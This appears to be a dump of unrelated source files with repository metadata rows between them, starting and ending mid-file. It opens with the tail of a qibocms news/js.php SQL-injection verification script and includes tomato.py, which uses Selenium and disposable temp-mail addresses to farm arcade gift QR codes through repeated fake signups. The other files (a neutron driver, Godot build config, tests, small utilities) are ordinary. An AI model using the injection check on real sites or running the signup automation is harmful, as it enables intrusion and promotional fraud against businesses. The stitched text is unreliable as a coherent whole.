req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在qibocms news/js.php文件参数f_idSQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = qibocms_js_f_id_sqli_BaseVerify(sys.argv[1])
testVuln.run()
| 34.4
| 223
| 0.647841
|
e3b1b536afba592a87c99ccbe30574f382de6676
| 1,771
|
py
|
Python
|
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
ashutosh-mishra/my-test
|
51c82af293f291b9182204392e7d21bda27786d1
|
[
"Apache-2.0"
] | null | null | null |
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
ashutosh-mishra/my-test
|
51c82af293f291b9182204392e7d21bda27786d1
|
[
"Apache-2.0"
] | null | null | null |
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
ashutosh-mishra/my-test
|
51c82af293f291b9182204392e7d21bda27786d1
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron._i18n import _LI
from neutron import manager as n_manager
from oslo_log import log as logging
from gbpservice.neutron.extensions import aim_driver_ext
from gbpservice.neutron.services.grouppolicy import (
group_policy_driver_api as api)
LOG = logging.getLogger(__name__)
class AIMExtensionDriver(api.ExtensionDriver):
_supported_extension_alias = aim_driver_ext.AIM_DRIVER_EXT
_extension_dict = aim_driver_ext.EXTENDED_ATTRIBUTES_2_0
def __init__(self):
LOG.info(_LI("AIM Extension __init__"))
self._policy_driver = None
@property
def _pd(self):
if not self._policy_driver:
gbp_plugin = (n_manager.NeutronManager.get_service_plugins()
.get("GROUP_POLICY"))
policy_mgr = gbp_plugin.policy_driver_manager
self._policy_driver = policy_mgr.policy_drivers['aim_mapping'].obj
return self._policy_driver
def initialize(self):
pass
@property
def extension_alias(self):
return self._supported_extension_alias
def extend_policy_target_group_dict(self, session, result):
self._pd.extend_policy_target_group_dict(session, result)
| 35.42
| 78
| 0.728402
|
5bedb0b5d6e4acbb2c6e26d715ba802d2ea48d64
| 4,580
|
py
|
Python
|
tomato.py
|
au5ton/tomato
|
324701c1ca89eaf51d1bea8156f7db7334a36211
|
[
"MIT"
] | null | null | null |
tomato.py
|
au5ton/tomato
|
324701c1ca89eaf51d1bea8156f7db7334a36211
|
[
"MIT"
] | null | null | null |
tomato.py
|
au5ton/tomato
|
324701c1ca89eaf51d1bea8156f7db7334a36211
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
import requests
import os
import os.path
import re
import argparse
from time import sleep
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
import platform
IS_MACOS = platform.system() == 'Darwin' # Define boolean for if the platform is macOS or not, useful for Keys.COMMAND vs Keys.CONTROl
PROJECT_DIRECTORY = os.path.split(os.path.realpath(__file__))[0]
def do_automation():
# selenium stuff
options = webdriver.ChromeOptions()
# uncomment to maintain cookies between sessions
#options.add_argument("user-data-dir=" + os.environ["CHROME_USER_DATA_DIR"]) # use already logged in user
options.add_argument('--log-level=3')
options.add_argument('--disable-logging')
print("\tStarted Chrome")
browser = webdriver.Chrome(executable_path=os.environ["CHROMEDRIVER_LOCATION"], chrome_options=options)
browser.get("https://www.tempmailaddress.com/")
temp_email = browser.find_element_by_id("email").text
print("\ttemp email: "+temp_email)
# opens and loads new arcade homepage
print("\tOpening Arcade homepage")
browser.execute_script("window.open('');")
browser.implicitly_wait(2)
browser.switch_to.window(browser.window_handles[1])
browser.get(os.environ["ARCADE_HOMEPAGE"])
browser.implicitly_wait(5)
# subscribes user on arcade homepage
print("\tSubscribing temp email")
form_element = browser.find_element_by_name("footerEmailForm")
form_input_element = browser.find_element_by_name("footerInputEmai1")
form_submit_button = browser.find_element_by_css_selector("form[name=\"footerEmailForm\"] input[type=\"submit\"]")
browser.execute_script("arguments[0].scrollIntoView();", form_input_element)
form_input_element.send_keys(temp_email)
form_submit_button.click()
sleep(5)
browser.close()
# back to tempmailaddress.com, previous tab
browser.switch_to.window(browser.window_handles[0])
browser.implicitly_wait(5)
browser.find_element_by_css_selector("a[href='#refresh']:not(.btn)").click()
sleep(5)
browser.find_element_by_css_selector("#schranka tr[data-href='2'].hidden-xs").click() # opens 2nd email received, subscription confirmation
browser.implicitly_wait(5)
# open individual email
iframe = browser.find_element_by_id('iframeMail')
browser.switch_to_frame(iframe)
browser.find_element_by_css_selector("a.mktbutton").click() # opens subscription signup
browser.implicitly_wait(5)
sleep(5)
# interact with signup form
browser.switch_to.window(browser.window_handles[1]) # switches to 2nd tab
print("\tInjecting MEFormFiller javascript")
browser.execute_script(open("./MEFormFiller.user.js").read())
browser.implicitly_wait(5)
sleep(5)
iframe2 = browser.find_element_by_css_selector('iframe#MarketingMicrositeIfr')
browser.switch_to_frame(iframe2)
browser.find_element_by_css_selector("button[name='ME_TabbedScreenFlow7_pyWorkPage_15']").click()
sleep(5)
browser.find_element_by_css_selector("button[name='ME_TabbedScreenFlow7_pyWorkPage_16']").click()
sleep(5)
browser.close()
browser.switch_to.window(browser.window_handles[0])
sleep(5)
# back to email to claim QR code
browser.switch_to_default_content()
sleep(5)
browser.find_element_by_css_selector("span.glyphicon-share-alt").click()
browser.implicitly_wait(5)
browser.find_element_by_css_selector("#schranka tr[data-href='3'].hidden-xs").click() # opens 3rd email received, gift receipt
browser.implicitly_wait(5)
# open individual email
iframe3 = browser.find_element_by_id('iframeMail')
browser.switch_to_frame(iframe3)
qr_code = browser.find_element_by_css_selector("img.cursordefault").get_attribute("src")
print("\tQR code: "+qr_code)
r = requests.get(qr_code, allow_redirects=True)
open(os.path.basename(qr_code), 'wb').write(r.content)
print("Saved to: "+os.path.basename(qr_code))
browser.switch_to_default_content()
browser.close()
return
# cli arguments
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store", dest="count", default="3", help="Specify card count as an integer")
args = parser.parse_args()
if args.count is None:
print("Must specify count with -L, see --help")
exit(1)
for i in range(1,int(args.count)+1):
print("Card [{}/{}]:".format(str(i), str(int(args.count))))
do_automation()
| 39.482759
| 143
| 0.74083
|
7a45211e8925177a09c3c169308916367f818d58
| 3,197
|
py
|
Python
|
tests/test_namespace.py
|
digitalsatori/cubes
|
140133e8c2e3f2ff60631cc3ebc9966d16c1655e
|
[
"MIT"
] | 1,020
|
2015-01-02T03:05:26.000Z
|
2022-02-12T18:48:51.000Z
|
tests/test_namespace.py
|
zshwuhan/cubes
|
6d83f04acb34eeb0b904dd1af0e97eda6621bf6c
|
[
"MIT"
] | 259
|
2015-01-02T22:35:14.000Z
|
2021-09-02T04:20:41.000Z
|
tests/test_namespace.py
|
zshwuhan/cubes
|
6d83f04acb34eeb0b904dd1af0e97eda6621bf6c
|
[
"MIT"
] | 288
|
2015-01-08T00:42:26.000Z
|
2022-03-31T17:25:10.000Z
|
import unittest
from cubes.namespace import Namespace
# from .common import CubesTestCaseBase
class NamespaceTestCase(unittest.TestCase):
def test_create(self):
ns = Namespace()
ns.create_namespace("slicer")
self.assertIn("slicer", ns.namespaces)
self.assertIsInstance(ns.namespaces["slicer"], Namespace)
def test_get_namespace(self):
base = Namespace()
slicerns = base.create_namespace("slicer")
self.assertEqual((base, None), base.namespace(""))
self.assertEqual((slicerns, None), base.namespace("slicer"))
self.assertEqual((base, "unknown"), base.namespace("unknown"))
self.assertEqual((base, "one.two"), base.namespace("one.two"))
def test_get_namespace_create(self):
base = Namespace()
slicerns = base.create_namespace("slicer")
self.assertEqual((base, None), base.namespace("", create=True))
self.assertEqual((slicerns, None), base.namespace("slicer", create=True))
(ns, remainder) = base.namespace("new", create=True)
self.assertEqual(None, remainder)
self.assertEqual((ns, None), base.namespace("new"))
(last, remainder) = base.namespace("one.two.three", create=True)
self.assertEqual(None, remainder)
self.assertIn("one", base.namespaces)
(ns, remainder) = base.namespace("one")
self.assertEqual(None, remainder)
self.assertIn("two", ns.namespaces)
(ns, remainder) = ns.namespace("two")
self.assertEqual(None, remainder)
self.assertIn("three", ns.namespaces)
(ns, remainder) = ns.namespace("three")
self.assertEqual(None, remainder)
(last, remainder) = base.namespace("one.two.three.four.five")
self.assertEqual("four.five", remainder)
@unittest.skip("We need some fake provider to test this")
def test_find_cube(self):
base = Namespace()
(ns, nsname, basename) = base.find_cube("cube")
self.assertEqual(ns, base)
self.assertEqual(nsname, "")
self.assertEqual(basename, "cube")
(ns, nsname, basename) = base.find_cube("extern.cube")
self.assertEqual(ns, base)
self.assertEqual(nsname, "")
self.assertEqual(basename, "extern.cube")
(ns, nsname, basename) = base.find_cube("even.deeper.extern.cube")
self.assertEqual(ns, base)
self.assertEqual(nsname, "")
self.assertEqual(basename, "even.deeper.extern.cube")
extern = base.create_namespace("extern")
(ns, nsname, basename) = base.find_cube("extern.cube")
self.assertEqual(ns, extern)
self.assertEqual(nsname, "")
self.assertEqual(basename, "cube")
(ns, nsname, basename) = base.find_cube("extern.deeper.cube")
self.assertEqual(ns, extern)
self.assertEqual(nsname, 'extern')
self.assertEqual(basename, "deeper.cube")
(deep, remainder) = base.namespace("even.deeper.extern", create=True)
(ns, nsname, basename) = base.find_cube("even.deeper.extern.cube")
self.assertEqual(ns, deep)
self.assertEqual(nsname, "")
self.assertEqual(basename, "cube")
| 37.174419
| 81
| 0.639037
|
72c3f60d99675915eb1fefadad0b7de2d22445e6
| 15,203
|
py
|
Python
|
platform/windows/detect.py
|
ericmccarthy7/godot
|
42f04cbc1a59772a5f7eca9c6847fa349b23a70e
|
[
"CC-BY-3.0",
"Apache-2.0",
"MIT"
] | 5
|
2018-08-18T15:06:49.000Z
|
2021-12-12T10:16:09.000Z
|
platform/windows/detect.py
|
ericmccarthy7/godot
|
42f04cbc1a59772a5f7eca9c6847fa349b23a70e
|
[
"CC-BY-3.0",
"Apache-2.0",
"MIT"
] | 18
|
2018-08-18T16:27:27.000Z
|
2021-12-12T13:31:33.000Z
|
platform/windows/detect.py
|
ericmccarthy7/godot
|
42f04cbc1a59772a5f7eca9c6847fa349b23a70e
|
[
"CC-BY-3.0",
"Apache-2.0",
"MIT"
] | 1
|
2020-08-13T18:03:24.000Z
|
2020-08-13T18:03:24.000Z
|
import methods
import os
def is_active():
return True
def get_name():
return "Windows"
def can_build():
if (os.name == "nt"):
# Building natively on Windows
# If VCINSTALLDIR is set in the OS environ, use traditional Godot logic to set up MSVC
if (os.getenv("VCINSTALLDIR")): # MSVC, manual setup
return True
# Otherwise, let SCons find MSVC if installed, or else Mingw.
# Since we're just returning True here, if there's no compiler
# installed, we'll get errors when it tries to build with the
# null compiler.
return True
if (os.name == "posix"):
# Cross-compiling with MinGW-w64 (old MinGW32 is not supported)
mingw32 = "i686-w64-mingw32-"
mingw64 = "x86_64-w64-mingw32-"
if (os.getenv("MINGW32_PREFIX")):
mingw32 = os.getenv("MINGW32_PREFIX")
if (os.getenv("MINGW64_PREFIX")):
mingw64 = os.getenv("MINGW64_PREFIX")
test = "gcc --version > /dev/null 2>&1"
if (os.system(mingw64 + test) == 0 or os.system(mingw32 + test) == 0):
return True
return False
def get_opts():
from SCons.Variables import BoolVariable, EnumVariable
mingw32 = ""
mingw64 = ""
if (os.name == "posix"):
mingw32 = "i686-w64-mingw32-"
mingw64 = "x86_64-w64-mingw32-"
if (os.getenv("MINGW32_PREFIX")):
mingw32 = os.getenv("MINGW32_PREFIX")
if (os.getenv("MINGW64_PREFIX")):
mingw64 = os.getenv("MINGW64_PREFIX")
return [
('mingw_prefix_32', 'MinGW prefix (Win32)', mingw32),
('mingw_prefix_64', 'MinGW prefix (Win64)', mingw64),
# Targeted Windows version: 7 (and later), minimum supported version
# XP support dropped after EOL due to missing API for IPv6 and other issues
# Vista support dropped after EOL due to GH-10243
('target_win_version', 'Targeted Windows version, >= 0x0601 (Windows 7)', '0x0601'),
EnumVariable('debug_symbols', 'Add debugging symbols to release builds', 'yes', ('yes', 'no', 'full')),
BoolVariable('separate_debug_symbols', 'Create a separate file containing debugging symbols', False),
('msvc_version', 'MSVC version to use. Ignored if VCINSTALLDIR is set in shell env.', None),
BoolVariable('use_mingw', 'Use the Mingw compiler, even if MSVC is installed. Only used on Windows.', False),
BoolVariable('use_llvm', 'Use the LLVM compiler', False),
BoolVariable('use_thinlto', 'Use ThinLTO', False),
]
def get_flags():
return [
]
def build_res_file(target, source, env):
if (env["bits"] == "32"):
cmdbase = env['mingw_prefix_32']
else:
cmdbase = env['mingw_prefix_64']
cmdbase = cmdbase + 'windres --include-dir . '
import subprocess
for x in range(len(source)):
cmd = cmdbase + '-i ' + str(source[x]) + ' -o ' + str(target[x])
try:
out = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE).communicate()
if len(out[1]):
return 1
except:
return 1
return 0
def setup_msvc_manual(env):
"""Set up env to use MSVC manually, using VCINSTALLDIR"""
if (env["bits"] != "default"):
print("""
Bits argument is not supported for MSVC compilation. Architecture depends on the Native/Cross Compile Tools Prompt/Developer Console
(or Visual Studio settings) that is being used to run SCons. As a consequence, bits argument is disabled. Run scons again without bits
argument (example: scons p=windows) and SCons will attempt to detect what MSVC compiler will be executed and inform you.
""")
raise SCons.Errors.UserError("Bits argument should not be used when using VCINSTALLDIR")
# Force bits arg
# (Actually msys2 mingw can support 64-bit, we could detect that)
env["bits"] = "32"
env["x86_libtheora_opt_vc"] = True
# find compiler manually
compiler_version_str = methods.detect_visual_c_compiler_version(env['ENV'])
print("Found MSVC compiler: " + compiler_version_str)
# If building for 64bit architecture, disable assembly optimisations for 32 bit builds (theora as of writing)... vc compiler for 64bit can not compile _asm
if(compiler_version_str == "amd64" or compiler_version_str == "x86_amd64"):
env["bits"] = "64"
env["x86_libtheora_opt_vc"] = False
print("Compiled program architecture will be a 64 bit executable (forcing bits=64).")
elif (compiler_version_str == "x86" or compiler_version_str == "amd64_x86"):
print("Compiled program architecture will be a 32 bit executable. (forcing bits=32).")
else:
print("Failed to manually detect MSVC compiler architecture version... Defaulting to 32bit executable settings (forcing bits=32). Compilation attempt will continue, but SCons can not detect for what architecture this build is compiled for. You should check your settings/compilation setup, or avoid setting VCINSTALLDIR.")
def setup_msvc_auto(env):
"""Set up MSVC using SCons's auto-detection logic"""
# If MSVC_VERSION is set by SCons, we know MSVC is installed.
# But we may want a different version or target arch.
# The env may have already been set up with default MSVC tools, so
# reset a few things so we can set it up with the tools we want.
# (Ideally we'd decide on the tool config before configuring any
# environment, and just set the env up once, but this function runs
# on an existing env so this is the simplest way.)
env['MSVC_SETUP_RUN'] = False # Need to set this to re-run the tool
env['MSVS_VERSION'] = None
env['MSVC_VERSION'] = None
env['TARGET_ARCH'] = None
if env['bits'] != 'default':
env['TARGET_ARCH'] = {'32': 'x86', '64': 'x86_64'}[env['bits']]
if env.has_key('msvc_version'):
env['MSVC_VERSION'] = env['msvc_version']
env.Tool('msvc')
env.Tool('mssdk') # we want the MS SDK
# Note: actual compiler version can be found in env['MSVC_VERSION'], e.g. "14.1" for VS2015
# Get actual target arch into bits (it may be "default" at this point):
if env['TARGET_ARCH'] in ('amd64', 'x86_64'):
env['bits'] = '64'
else:
env['bits'] = '32'
print("Found MSVC version %s, arch %s, bits=%s" % (env['MSVC_VERSION'], env['TARGET_ARCH'], env['bits']))
if env['TARGET_ARCH'] in ('amd64', 'x86_64'):
env["x86_libtheora_opt_vc"] = False
def setup_mingw(env):
"""Set up env for use with mingw"""
# Nothing to do here
print("Using MinGW")
pass
def configure_msvc(env, manual_msvc_config):
"""Configure env to work with MSVC"""
# Build type
if (env["target"] == "release"):
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(CCFLAGS=['/O2'])
else: # optimize for size
env.Append(CCFLAGS=['/O1'])
env.Append(LINKFLAGS=['/SUBSYSTEM:WINDOWS'])
env.Append(LINKFLAGS=['/ENTRY:mainCRTStartup'])
env.Append(LINKFLAGS=['/OPT:REF'])
elif (env["target"] == "release_debug"):
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(CCFLAGS=['/O2'])
else: # optimize for size
env.Append(CCFLAGS=['/O1'])
env.AppendUnique(CPPDEFINES = ['DEBUG_ENABLED'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
env.Append(LINKFLAGS=['/OPT:REF'])
elif (env["target"] == "debug"):
env.AppendUnique(CCFLAGS=['/Z7', '/Od', '/EHsc'])
env.AppendUnique(CPPDEFINES = ['DEBUG_ENABLED', 'DEBUG_MEMORY_ENABLED',
'D3D_DEBUG_INFO'])
env.Append(LINKFLAGS=['/SUBSYSTEM:CONSOLE'])
env.Append(LINKFLAGS=['/DEBUG'])
if (env["debug_symbols"] == "full" or env["debug_symbols"] == "yes"):
env.AppendUnique(CCFLAGS=['/Z7'])
env.AppendUnique(LINKFLAGS=['/DEBUG'])
## Compile/link flags
env.AppendUnique(CCFLAGS=['/MT', '/Gd', '/GR', '/nologo'])
if int(env['MSVC_VERSION'].split('.')[0]) >= 14: #vs2015 and later
env.AppendUnique(CCFLAGS=['/utf-8'])
env.AppendUnique(CXXFLAGS=['/TP']) # assume all sources are C++
if manual_msvc_config: # should be automatic if SCons found it
if os.getenv("WindowsSdkDir") is not None:
env.Prepend(CPPPATH=[os.getenv("WindowsSdkDir") + "/Include"])
else:
print("Missing environment variable: WindowsSdkDir")
env.AppendUnique(CPPDEFINES = ['WINDOWS_ENABLED', 'OPENGL_ENABLED',
'WASAPI_ENABLED', 'WINMIDI_ENABLED',
'TYPED_METHOD_BIND',
'WIN32', 'MSVC',
'WINVER=%s' % env["target_win_version"],
'_WIN32_WINNT=%s' % env["target_win_version"]])
env.AppendUnique(CPPDEFINES=['NOMINMAX']) # disable bogus min/max WinDef.h macros
if env["bits"] == "64":
env.AppendUnique(CPPDEFINES=['_WIN64'])
## Libs
LIBS = ['winmm', 'opengl32', 'dsound', 'kernel32', 'ole32', 'oleaut32',
'user32', 'gdi32', 'IPHLPAPI', 'Shlwapi', 'wsock32', 'Ws2_32',
'shell32', 'advapi32', 'dinput8', 'dxguid', 'imm32', 'bcrypt','Avrt',
'dwmapi']
env.Append(LINKFLAGS=[p + env["LIBSUFFIX"] for p in LIBS])
if manual_msvc_config:
if os.getenv("WindowsSdkDir") is not None:
env.Append(LIBPATH=[os.getenv("WindowsSdkDir") + "/Lib"])
else:
print("Missing environment variable: WindowsSdkDir")
## LTO
if (env["use_lto"]):
env.AppendUnique(CCFLAGS=['/GL'])
env.AppendUnique(ARFLAGS=['/LTCG'])
if env["progress"]:
env.AppendUnique(LINKFLAGS=['/LTCG:STATUS'])
else:
env.AppendUnique(LINKFLAGS=['/LTCG'])
if manual_msvc_config:
env.Prepend(CPPPATH=[p for p in os.getenv("INCLUDE").split(";")])
env.Append(LIBPATH=[p for p in os.getenv("LIB").split(";")])
# Incremental linking fix
env['BUILDERS']['ProgramOriginal'] = env['BUILDERS']['Program']
env['BUILDERS']['Program'] = methods.precious_program
def configure_mingw(env):
# Workaround for MinGW. See:
# http://www.scons.org/wiki/LongCmdLinesOnWin32
env.use_windows_spawn_fix()
## Build type
if (env["target"] == "release"):
env.Append(CCFLAGS=['-msse2'])
if (env["optimize"] == "speed"): #optimize for speed (default)
if (env["bits"] == "64"):
env.Append(CCFLAGS=['-O3'])
else:
env.Append(CCFLAGS=['-O2'])
else: #optimize for size
env.Prepend(CCFLAGS=['-Os'])
env.Append(LINKFLAGS=['-Wl,--subsystem,windows'])
if (env["debug_symbols"] == "yes"):
env.Prepend(CCFLAGS=['-g1'])
if (env["debug_symbols"] == "full"):
env.Prepend(CCFLAGS=['-g2'])
elif (env["target"] == "release_debug"):
env.Append(CCFLAGS=['-O2'])
env.Append(CPPDEFINES=['DEBUG_ENABLED'])
if (env["debug_symbols"] == "yes"):
env.Prepend(CCFLAGS=['-g1'])
if (env["debug_symbols"] == "full"):
env.Prepend(CCFLAGS=['-g2'])
if (env["optimize"] == "speed"): #optimize for speed (default)
env.Append(CCFLAGS=['-O2'])
else: #optimize for size
env.Prepend(CCFLAGS=['-Os'])
elif (env["target"] == "debug"):
env.Append(CCFLAGS=['-g3'])
env.Append(CPPDEFINES=['DEBUG_ENABLED', 'DEBUG_MEMORY_ENABLED'])
## Compiler configuration
if os.name != "nt":
env["PROGSUFFIX"] = env["PROGSUFFIX"] + ".exe" # for linux cross-compilation
if (env["bits"] == "default"):
if (os.name == "nt"):
env["bits"] = "64" if "PROGRAMFILES(X86)" in os.environ else "32"
else: # default to 64-bit on Linux
env["bits"] = "64"
mingw_prefix = ""
if (env["bits"] == "32"):
env.Append(LINKFLAGS=['-static'])
env.Append(LINKFLAGS=['-static-libgcc'])
env.Append(LINKFLAGS=['-static-libstdc++'])
mingw_prefix = env["mingw_prefix_32"]
else:
env.Append(LINKFLAGS=['-static'])
mingw_prefix = env["mingw_prefix_64"]
if env['use_llvm']:
env["CC"] = mingw_prefix + "clang"
env['AS'] = mingw_prefix + "as"
env["CXX"] = mingw_prefix + "clang++"
env['AR'] = mingw_prefix + "ar"
env['RANLIB'] = mingw_prefix + "ranlib"
env["LINK"] = mingw_prefix + "clang++"
else:
env["CC"] = mingw_prefix + "gcc"
env['AS'] = mingw_prefix + "as"
env['CXX'] = mingw_prefix + "g++"
env['AR'] = mingw_prefix + "gcc-ar"
env['RANLIB'] = mingw_prefix + "gcc-ranlib"
env['LINK'] = mingw_prefix + "g++"
env["x86_libtheora_opt_gcc"] = True
if env['use_lto']:
if not env['use_llvm'] and env.GetOption("num_jobs") > 1:
env.Append(CCFLAGS=['-flto'])
env.Append(LINKFLAGS=['-flto=' + str(env.GetOption("num_jobs"))])
else:
if env['use_thinlto']:
env.Append(CCFLAGS=['-flto=thin'])
env.Append(LINKFLAGS=['-flto=thin'])
else:
env.Append(CCFLAGS=['-flto'])
env.Append(LINKFLAGS=['-flto'])
## Compile flags
env.Append(CCFLAGS=['-mwindows'])
env.Append(CPPDEFINES=['WINDOWS_ENABLED', 'OPENGL_ENABLED', 'WASAPI_ENABLED', 'WINMIDI_ENABLED'])
env.Append(CPPDEFINES=[('WINVER', env['target_win_version']), ('_WIN32_WINNT', env['target_win_version'])])
env.Append(LIBS=['mingw32', 'opengl32', 'dsound', 'ole32', 'd3d9', 'winmm', 'gdi32', 'iphlpapi', 'shlwapi', 'wsock32', 'ws2_32', 'kernel32', 'oleaut32', 'dinput8', 'dxguid', 'ksuser', 'imm32', 'bcrypt', 'avrt', 'uuid', 'dwmapi'])
env.Append(CPPDEFINES=['MINGW_ENABLED', ('MINGW_HAS_SECURE_API', 1)])
# resrc
env.Append(BUILDERS={'RES': env.Builder(action=build_res_file, suffix='.o', src_suffix='.rc')})
def configure(env):
# At this point the env has been set up with basic tools/compilers.
env.Prepend(CPPPATH=['#platform/windows'])
print("Configuring for Windows: target=%s, bits=%s" % (env['target'], env['bits']))
if (os.name == "nt"):
env['ENV'] = os.environ # this makes build less repeatable, but simplifies some things
env['ENV']['TMP'] = os.environ['TMP']
# First figure out which compiler, version, and target arch we're using
if os.getenv("VCINSTALLDIR") and not env["use_mingw"]:
# Manual setup of MSVC
setup_msvc_manual(env)
env.msvc = True
manual_msvc_config = True
elif env.get('MSVC_VERSION', '') and not env["use_mingw"]:
setup_msvc_auto(env)
env.msvc = True
manual_msvc_config = False
else:
setup_mingw(env)
env.msvc = False
# Now set compiler/linker flags
if env.msvc:
configure_msvc(env, manual_msvc_config)
else: # MinGW
configure_mingw(env)
| 39.284238
| 330
| 0.60021
|
f8c0dcbe0db7df65069f175537bc73babfc15c04
| 2,751
|
py
|
Python
|
src/medford.py
|
infispiel/MEDFORD
|
a5f1523be53690aa20dae19add44c27ad1a254a4
|
[
"MIT"
] | 3
|
2021-02-24T17:10:10.000Z
|
2021-05-07T15:32:16.000Z
|
src/medford.py
|
infispiel/MEDFORD
|
a5f1523be53690aa20dae19add44c27ad1a254a4
|
[
"MIT"
] | 4
|
2021-10-08T17:03:26.000Z
|
2022-01-21T14:43:19.000Z
|
src/medford.py
|
infispiel/MEDFORD
|
a5f1523be53690aa20dae19add44c27ad1a254a4
|
[
"MIT"
] | null | null | null |
from medford_detailparser import *
from medford_detail import *
from medford_models import BCODMO, Entity
from medford_BagIt import runBagitMode, BagIt
import json
import argparse
from enum import Enum, auto
class MFDMode(Enum) :
OTHER = 'OTHER'
BCODMO = 'BCODMO'
BAGIT = 'BAGIT'
def __str__(self):
return self.value
class ParserMode(Enum) :
validate = 'validate'
compile = 'compile'
def __str__(self):
return self.value
# Command Line Arguments
# TODO: How can I make it require an MFDMode value, but lowercase is OK?
# Do I actually care?
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mode", type=MFDMode, choices=list(MFDMode), default=MFDMode.OTHER, required=True,
help="Which Output mode the MEDFORD parser should validate or compile for.")
parser.add_argument("action", type=ParserMode, choices=list(ParserMode),
help="Whether the MEDFORD parser is only validating or actually compiling (performing any necessary adjustments or actions for the appropriate format, such as creating a Bag for the BagIt mode.)")
parser.add_argument("file", type=str, help="The input MEDFORD file to validate or compile.")
parser.add_argument("--write_json", action="store_true", default=False,
help="Write a JSON file of the internal representation of the MEDFORD file beside the input MEDFORD file.")
parser.add_argument("--debug", "-d", "-v", action="store_true", default=False,
help="Enable verbose mode for MEDFORD, enabling various debug messages during runtime.")
def runMedford(filename, output_json, mode):
class FieldError(Exception):
pass
details = []
with open(filename, 'r') as f:
all_lines = f.readlines()
dr = None
for i, line in enumerate(all_lines):
if(line.strip() != "") :
# TODO: move the details collection logic to detail? I don't like that we have to pull the typing here.
dr = detail.FromLine(line, i+1, dr)
if isinstance(dr, detail_return) :
if dr.is_novel :
details.append(dr.detail)
parser = detailparser(details)
final_dict = parser.export()
if mode == MFDMode.BCODMO:
p = BCODMO(**final_dict)
elif mode == MFDMode.BAGIT:
p = BagIt(**final_dict)
runBagitMode(p, filename)
elif mode == MFDMode.OTHER:
p = Entity(**final_dict)
else :
raise Exception("Medford is running in an unsupported mode.")
if(output_json) :
with open(filename + ".JSON", 'w') as f:
json.dump(final_dict, f, indent=2)
if __name__ == "__main__":
args = parser.parse_args()
runMedford(args.file, args.write_json, args.mode)
| 36.68
| 200
| 0.668121
|
629b50479c0720022e4fb0097f8e9a3847140505
| 710
|
py
|
Python
|
autograder-master/setup.py
|
Diana1320622/AILabs
|
315a6f4b8f8dd60e4f53d348e06e23b4d827d179
|
[
"MIT"
] | null | null | null |
autograder-master/setup.py
|
Diana1320622/AILabs
|
315a6f4b8f8dd60e4f53d348e06e23b4d827d179
|
[
"MIT"
] | null | null | null |
autograder-master/setup.py
|
Diana1320622/AILabs
|
315a6f4b8f8dd60e4f53d348e06e23b4d827d179
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(name='autograder',
version='0.1',
description='Autograder for programming projects',
url='http://github.com/rhomeister/autograder',
author='Ruben Stranders',
author_email='r.stranders@gmail.com',
license='MIT',
packages=['autograder',
'autograder.checks',
'autograder.analysis'],
install_requires=[
'gitpython',
'gitinspector',
'numpy',
'colorama'
],
entry_points = {
'console_scripts': [
'autograder=autograder.cli:main'
],
},
zip_safe=False
)
| 26.296296
| 58
| 0.508451
|
a3c1fa0b66007b2ddfb9e06b74406802018a8fea
| 227
|
py
|
Python
|
jp.atcoder/abc215/abc215_c/30948214.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc215/abc215_c/30948214.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc215/abc215_c/30948214.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import itertools
def main() -> None:
s, k = input().split()
k = int(k)
a = sorted(set(map(lambda x: "".join(x), itertools.permutations(s))))
print(a[k - 1])
if __name__ == "__main__":
main()
| 17.461538
| 74
| 0.528634
|
116b69777cb64b4639ff188121fd40ee95abb685
| 16,195
|
py
|
Python
|
magenta/models/rl_tuner/note_rnn_loader.py
|
jopdorp/classical-polyphony-rnn
|
8fcdce4c974b1c5a463cbd30ea85bdf98d4f8bde
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/rl_tuner/note_rnn_loader.py
|
jopdorp/classical-polyphony-rnn
|
8fcdce4c974b1c5a463cbd30ea85bdf98d4f8bde
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/rl_tuner/note_rnn_loader.py
|
jopdorp/classical-polyphony-rnn
|
8fcdce4c974b1c5a463cbd30ea85bdf98d4f8bde
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a class and operations for the MelodyRNN model.
